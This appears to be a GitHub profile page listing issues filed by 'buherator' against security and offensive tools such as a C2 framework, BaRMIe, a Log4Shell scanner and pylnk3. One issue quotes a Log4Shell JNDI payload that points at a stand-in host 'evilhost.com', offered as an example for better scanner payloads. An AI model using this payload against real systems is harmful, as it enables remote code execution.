buherator

Results 33 issues of buherator

I need some packages in my `BridgeMessenger`, but I can't use the `using` directive in the code, because these directives are inserted at a place where `using` is illegal during...

**Feature Request or Bug** Bug **Describe the feature request or bug** Listeners start to serve responses based on profiles of different listeners, practically killing grunt communication. **To Reproduce** Steps to...

wontfix

> "More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future." Some additional documentation regarding extending this tool would be really useful...

I'm wondering if conditional execution primitives could be integrated to this tool - they are pretty useful for bypassing sandboxes/nextgen protections: https://blog.silentsignal.eu/2017/12/05/conditional-dde/

enhancement

Creating encrypted/encoded payloads to get through filtering proxies can be daunting. It would be nice if the server could do this by itself, preferably even providing matching decoder stubs (PS,...

feature-request

This will require improved payloads: https://twitter.com/marcioalm/status/1471740771581652995 Example from the twitter: ``` ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} ```

enhancement

I wonder if it would make sense to generate a low confidence issue if the answer takes >29s to arrive (I've read that Java timeouts after 31s and Burp drops...

enhancement

I tried to use Piper HTTP Listener to transform large request bodies using an external Python script. While the script mostly worked, Piper caused a hang when the script generated...

bug
help wanted

### Describe the bug The plugin just deleted all contents of the wp-content/uploads directory... ### Steps to reproduce the behavior I'm using WordPress as packaged in Debian Bullseye. I suspect...

As it is noted in #22 the current implementation only works when the target is present on the system where pylnk3 is used. This PR adds support for nonexistent ("imaginary")...